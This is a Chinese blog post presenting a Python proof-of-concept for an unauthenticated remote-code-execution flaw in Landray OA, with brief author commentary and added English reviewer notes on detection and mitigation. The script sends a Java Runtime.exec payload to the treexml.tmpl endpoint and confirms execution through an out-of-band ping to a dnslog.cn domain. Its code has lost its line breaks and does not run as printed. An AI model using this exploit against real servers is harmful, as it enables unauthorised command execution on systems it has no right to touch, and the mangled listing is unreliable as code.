这里我们借助 Burp 的辅助工具来构造前期的请求包，之后只需要专注于逻辑处理。
这里就可以用 Python 对这个请求包发起请求。
好了，不废话，上正文。
蓝凌未授权 RCE PoC
# NOTE(review): this listing lost its line breaks during extraction, so the two
# physical lines below do not parse as written. The original token sequence is
# kept byte-identical here; only these comments are added.
#
# What the script does, as far as the visible code shows:
#   - random_str(n): builds an n-character string of lowercase ASCII letters
#     from random.randint(97, 122). Its local variable shadows the builtin `str`.
#   - cookie: a 26-character random_str value sent as the PHPSESSID cookie to
#     www.dnslog.cn / dnslog.cn, so that getdomain.php and getrecords.php are
#     tied to the same session.
#   - get_domain_or_check(type): type == 1 fetches getdomain.php and returns the
#     response body (a DNS-logging domain); type == 2 sleeps 0.8 s, fetches
#     getrecords.php and treats a body longer than 2 characters as a hit.
#     `type` shadows the builtin of the same name.
#   - test(url): POSTs s_bean=ruleFormulaValidate plus a `script` field to
#     <url>/data/sys-common/treexml.tmpl and, on HTTP 200, calls
#     get_domain_or_check(2). The out-of-band DNS lookup is the only oracle:
#     a 200 response with no dnslog record prints "漏洞不存在", so a host that
#     cannot resolve external DNS is reported as not vulnerable (false
#     negative). A non-200 status is likewise reported as not vulnerable.
#   - parse_args(): a single required -u/--url option.
#
# Defender notes:
#   - Detection: alert on POST requests to */data/sys-common/treexml.tmpl whose
#     body carries s_bean=ruleFormulaValidate together with a `script`
#     parameter, and on the application server resolving *.dnslog.cn or other
#     out-of-band DNS domains. The hard-coded User-Agent strings below are
#     weak additional indicators.
#   - Mitigation: apply the vendor's fix for this endpoint (no fixed version is
#     stated on this page), deny unauthenticated access to
#     /data/sys-common/treexml.tmpl at the reverse proxy, and restrict egress
#     DNS/HTTP from the OA host where it is not required.
import argparseimport sysimport requestsimport timeimport randomdef random_str(n):str = ''for i in range(n):str += chr(random.randint(97, 122))return strcookie = random_str(26)headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1","User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:100.0) Gecko/20000101 Firefox/100.0","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9","Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}def get_domain_or_check(type):if type == 1:url = "http://www.dnslog.cn:80/getdomain.php"cookies = {"PHPSESSID": cookie}res = requests.get(url, headers=headers, cookies=cookies)print("[+] dnslog:" + res.text)return res.textelif type == 2:url = "http://dnslog.cn:80/getrecords.php?t=0.18836534176098696"cookies = {"PHPSESSID": cookie}time.sleep(0.8)res = requests.get(url, headers=headers, cookies=cookies)if len(res.text) > 2:print("[+] Success 漏洞存在: " + res.text)else:print("[+] 漏洞不存在")def test(url):cmd = "ping " + get_domain_or_check(1)headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36","Connection": "close", "Accept": "*/*", "Accept-Language": "en","Content-Type": "application/x-www-form-urlencoded", "Pragma": "no-cache", "Accept-Encoding": "gzip, deflate"}data = {"s_bean": "ruleFormulaValidate", "script": "try {String cmd = \"" + str(cmd) + "\";Process process = Runtime.getRuntime().exec(cmd);} catch (IOException e) {System.err.println(e);}"}if url[-1] != "/":url = url + "/data/sys-common/treexml.tmpl"else:url = url + "data/sys-common/treexml.tmpl"res = requests.post(url, headers=headers, data=data)if res.status_code == 200:get_domain_or_check(2)else:print("[+] 状态码" + str(res.status_code) + " 漏洞不存在")def parse_args():parser = argparse.ArgumentParser(epilog="\tExample: \r\npython " + 
sys.argv[0] + " -u target")parser._optionals.title = "OPTIONS"parser.add_argument('-u', '--url', help="url.", required=True, type=str)return parser.parse_args()if __name__ == '__main__':print("\033[1;32mAuthor: by567 暗\033[0m")args = parse_args()url = args.urltest(url)
这里分析了 dnslog.cn 的 getdomain.php 和 getrecords.php，用它们来获取 dnslog 的测试结果。
通过 getdomain.php 获取测试用的 dnslog 域名；这里 PHPSESSID 要设置成我们自己构造的值，这样后续查询时才能获取到结果。
接着就是发起请求，并对数据包进行分析处理。
代码写得比较 low，大佬勿喷。